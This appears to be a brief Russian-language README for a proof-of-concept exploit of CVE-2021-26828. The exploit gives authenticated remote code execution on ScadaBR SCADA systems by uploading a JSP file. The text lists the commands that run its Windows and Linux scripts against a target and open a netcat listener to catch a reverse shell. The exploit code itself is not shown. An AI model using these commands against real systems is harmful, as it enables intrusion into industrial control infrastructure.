
Эксплойт proof-of-concept для CVE-2021-26828, позволяющий выполнить аутентифицированное удаленное выполнение кода в SCADA-системах ScadaBR через загрузку JSP-файлов. Поддерживает цели на Windows и Linux с полезными нагрузками reverse shell.
$ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>
$ sudo nc -vnlp 4444
$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>

Ссылки: